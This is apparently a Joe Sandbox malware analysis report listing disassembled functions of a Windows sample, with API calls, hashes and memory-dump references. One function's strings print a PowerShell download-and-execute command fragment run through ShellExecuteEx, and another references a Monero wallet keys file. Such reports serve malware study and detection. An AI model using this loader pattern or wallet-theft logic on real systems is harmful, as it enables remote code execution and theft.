                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction ID: bdfce90d79280427a8357d8ed292d37a123c2af8bcea4a5137fdc926cfd00f09
                                • Opcode Fuzzy Hash: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction Fuzzy Hash: 44F05E30D04309EFD3599FE0F50976C7B74FF04707F0441AAE61A97285D6B14B819B95
                                Function 00EC4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4FD1
                                • InternetOpenA.WININET(00EE0DDF,00000000,00000000,00000000,00000000), ref: 00EC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EC5041
                                • InternetCloseHandle.WININET(?), ref: 00EC50B9
                                • InternetCloseHandle.WININET(?), ref: 00EC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: bc9589ed17e965a66eb856f64e52fa909e89165ef71153fc1feb77a98f8d6ea3
                                • Instruction ID: fb4ed09fef97a481e2c80508122ae3fb4c4e317e578cf621577f23e36ae61f27
                                • Opcode Fuzzy Hash: bc9589ed17e965a66eb856f64e52fa909e89165ef71153fc1feb77a98f8d6ea3
                                • Instruction Fuzzy Hash: AD3109B5E0021CABDB24CF54DD85BDCB7B4EB48704F1081E9EA09B7285C7B16AC58F98
                                Function 00ED83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DDE8,00000000,000F003F,?,00000400), ref: 00ED84EC
                                • lstrlen.KERNEL32(?), ref: 00ED8501
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DC68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EE0B34), ref: 00ED8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction ID: 1f30b8280f0454ec13698318f5912a95f4cd84a8475a2a31fdf9e71a4e31c161
                                • Opcode Fuzzy Hash: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction Fuzzy Hash: 8421D8719102189BDB28DB54DC85FE9B3B8FF48714F00C5A9A609A6240DF71AA86CF94
                                Function 00ED7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7B818,00000000,00020119,00000000), ref: 00ED76DD
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DDB8,00000000,00000000,?,000000FF), ref: 00ED76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction ID: e95e91f12d8f4b80f493a897c718a58cae7301bb071f8b5406e96513ebadd37b
                                • Opcode Fuzzy Hash: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction Fuzzy Hash: 3E01A7B5E04308BBD715DBE0E849F6D77B8EF44701F008466FA55E7284E6B19A418B50
                                Function 00ED7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED773B
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7B818,00000000,00020119,00ED76B9), ref: 00ED775B
                                • RegQueryValueExA.ADVAPI32(00ED76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00ED777A
                                • RegCloseKey.ADVAPI32(00ED76B9), ref: 00ED7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction ID: 0f6a2d75102a596dbebcff11b4c1586a78c404b8229c287fed79e271bb69bf0c
                                • Opcode Fuzzy Hash: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction Fuzzy Hash: 2601A2B5E00308BFDB14DBE0EC4AFAEB7B8EF48701F004069FA15A7284DAB05A408B50
                                Function 00ED92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00ED3AEE,?), ref: 00ED92FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00ED9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00ED9327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction ID: 99b3ab7073d0ad9bd7a3480797bce46b3916cf0ec6737862596f18d87c9d5eef
                                • Opcode Fuzzy Hash: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction Fuzzy Hash: 6DF04F35E40308BBDB28DFB0EC49F9E77B9EB48710F10C264B661B72C4D6B196418B40
                                Function 00ED40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00ED40D5
                                • RegOpenKeyExA.ADVAPI32(80000001,01B8D178,00000000,00020119,?), ref: 00ED40F4
                                • RegQueryValueExA.ADVAPI32(?,01B8DEC0,00000000,00000000,00000000,000000FF), ref: 00ED4118
                                • RegCloseKey.ADVAPI32(?), ref: 00ED4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4147
                                • lstrcat.KERNEL32(?,01B8DED8), ref: 00ED415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction ID: 4653ba3682d7714859aa34de1a53eb740e2d19298504ee33e7183627950c4efd
                                • Opcode Fuzzy Hash: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction Fuzzy Hash: BA419CB6D0020867DB29EBB0EC46FEE737DAB48300F00455DB62557185EAB59BC98BD1
                                Function 00EC99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                • LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction ID: 1446f85f935beb32de28f18bf6ff20a7cae8799242e9a3f85809e8b564603437
                                • Opcode Fuzzy Hash: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction Fuzzy Hash: BF312A74E00209EFDB24CF94D989FAE77B5FF48304F108158E911A7290D775AA82CFA0
                                Function 00EDC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: 83f94fe93a0d7c39309451bf3af869439ea25b337a05c21a6666be0f3d6a079c
                                • Instruction ID: 11b5470fb903afb7653e5b11ed4185252c8e8553cd7635c96650bf05ff9893d4
                                • Opcode Fuzzy Hash: 83f94fe93a0d7c39309451bf3af869439ea25b337a05c21a6666be0f3d6a079c
                                • Instruction Fuzzy Hash: EB4159B110079C5EDB218B24CC94FFB7BE8DF45348F2454E9E58AA6282D2719A46DF60
                                Function 00ED4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,01B8DE30), ref: 00ED47DB
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4801
                                • lstrcat.KERNEL32(?,?), ref: 00ED4820
                                • lstrcat.KERNEL32(?,?), ref: 00ED4834
                                • lstrcat.KERNEL32(?,01B7B180), ref: 00ED4847
                                • lstrcat.KERNEL32(?,?), ref: 00ED485B
                                • lstrcat.KERNEL32(?,01B8D1B8), ref: 00ED486F
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00ED4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                  • Part of subcall function 00ED4570: RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                  • Part of subcall function 00ED4570: wsprintfA.USER32 ref: 00ED45A6
                                  • Part of subcall function 00ED4570: FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction ID: 3199a661e540aa8da9a41e30de25da32e67157bb77bd990dbbbbe35ce61993b4
                                • Opcode Fuzzy Hash: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction Fuzzy Hash: 3E3182B690031857CB25F7A0DC85EED73BCBB58300F40559AB359A6181EEB0D7CACB91
                                Function 00ED2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED2D85
                                Strings
                                • ')", xrefs: 00ED2CB3
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00ED2CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00ED2D04
                                • <, xrefs: 00ED2D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
